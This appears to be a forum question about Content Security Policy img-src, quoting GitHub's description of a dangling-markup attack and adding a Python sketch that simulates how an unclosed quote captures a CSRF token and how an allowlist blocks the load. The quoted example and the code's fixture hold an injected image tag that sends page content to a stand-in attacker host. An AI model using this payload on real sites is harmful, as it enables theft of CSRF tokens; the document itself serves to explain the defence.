GitHub explains the problem with img-src in "GitHub's post-CSP journey":
A tag with an unclosed quote will capture all output up to the next matching quote. This could include security sensitive content on the pages such as:
<img src='https://some-evil-site.com/log_csrf?html=
<form action="https://github.com/account/public_keys/19023812091023">
  ...
  <input type="hidden" name="csrf_token" value="some_csrf_token_value">
</form>
The resulting image element will send a request to https://some-evil-site.com/log_csrf?html=...some_csrf_token_value.... As a result, an attacker can leverage this dangling markup attack to exfiltrate CSRF tokens to a site of their choosing.
How does this differ from pressing page-source on the page and sending the content manually? If it is just for pages where users can insert input, don't we only have to prevent those issues with inputs by adding validation to the input, rather than preventing img src from other sources in all the code?
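To make the quoted mechanism concrete, here is an added example (my own code, not GitHub's): it reproduces how the tokenizer turns everything after the unclosed quote into the src value, then checks that request against a constructed img-src allowlist. The page fragment, the policy string and the helper names are assumptions for illustration.

```python
from urllib.parse import urlsplit

# Constructed page fragment: an injected <img src=' with no closing quote, followed by
# the legitimate page's form (the token value is a placeholder, as in the quoted post).
PAGE_FRAGMENT = """<img src='https://some-evil-site.com/log_csrf?html=
<form action="https://github.com/account/public_keys/19023812091023">
<input type="hidden" name="csrf_token" value="some_csrf_token_value">
</form>
<p class='note'>Your public keys</p>
"""

def captured_src(html: str) -> str:
    """Tokenizer rule: after src=' everything up to the next ' (or EOF) is the value."""
    start = html.find("src='")
    if start == -1:
        return ""
    start += len("src='")
    end = html.find("'", start)
    return html[start:] if end == -1 else html[start:end]

def source_matches(expr: str, url: str, page_origin: str) -> bool:
    """Match one CSP source expression to a URL (simplified: no ports or path parts)."""
    u = urlsplit(url)
    if expr == "*":                              # wildcard: http(s) only in this model
        return u.scheme in ("http", "https")
    if expr == "'self'":
        return urlsplit(page_origin)[:2] == (u.scheme, u.netloc)
    scheme, _, host = expr.partition("://")      # host-source, scheme optional
    if not host:
        scheme, host = u.scheme, expr
    host = host.split("/")[0].lower()
    if scheme != u.scheme:
        return False
    if host.startswith("*."):
        return (u.hostname or "").endswith(host[1:])
    return u.hostname == host                    # 'none' never equals a hostname

def img_src_allows(policy: str, url: str, page_origin: str) -> bool:
    """True if img-src (or the default-src fallback) permits loading url."""
    directives = {}
    for directive in policy.split(";"):
        parts = directive.split()
        if parts:
            directives[parts[0].lower()] = parts[1:]
    sources = directives.get("img-src", directives.get("default-src", ["*"]))
    return any(source_matches(s, url, page_origin) for s in sources)

def demo() -> tuple[bool, bool]:
    """Does the captured src carry the token, and would an img-src allowlist permit it?"""
    src = captured_src(PAGE_FRAGMENT)
    policy = "default-src 'none'; img-src 'self' https://*.githubusercontent.com"
    return "some_csrf_token_value" in src, img_src_allows(policy, src, "https://github.com")
```

The capture stops only at the next single quote, so the token lands in the request URL regardless of input validation elsewhere on the page; the allowlist refuses the load because the destination host is not a permitted image source.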